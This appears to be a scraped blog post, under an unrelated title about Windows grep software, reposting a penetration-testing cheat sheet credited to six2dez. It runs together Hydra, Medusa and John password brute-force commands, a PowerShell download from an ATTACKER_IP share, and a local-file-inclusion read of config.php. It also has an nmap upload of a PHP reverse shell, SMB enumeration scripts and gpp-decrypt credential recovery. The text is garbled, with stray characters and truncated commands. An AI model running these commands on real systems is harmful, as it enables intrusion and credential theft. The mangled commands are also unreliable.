AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
Windows grep softwaregithub12/7/2023 Hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!" Hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V Hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V Hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V Hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V Hydra -l root -P password-file.txt 10.11.1.111 ssh Medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10 John -rules -wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt \\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color \\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "" -OutFile "C:\\windows\\system32\\spool\\drivers\\color Access it via browser (2 request attack): Start SMB Server in attacker machine and put evil script # Contaminating log nc -v 10.11.1.111 80ġ0.11.1.111: inverse host lookup failed: Unknown host ?page=php://filter/convert.base64-encode/resource=./config.php # Simple curl POST request with login dataĬurl -X POST -d 'username=centreon&password=wall'ĭ -m http -h 10.11.1.111 -M GET -o unix Nmap -p 80 192.168.1.124 -script http-put -script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php' # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) Smbmap -u victim -p s3cr3t -H 10.11.1.111ĭentro de \Policies\\MACHINE\Preferences\Groups\Groups.xml está el usuario y la contraseña que se puede desencriptar con "gpp-decrypt "Ĭms-explorer -url -type Nmap -script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 Nmap -script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 Windows create SMB Server transfer files.I decided to archive here for my own use and modification.īig shout out to six2dez for putting this list together. ![]() I began working on something similar myself involving excel, until I came into this little gem.
0 Comments
Read More
Leave a Reply. |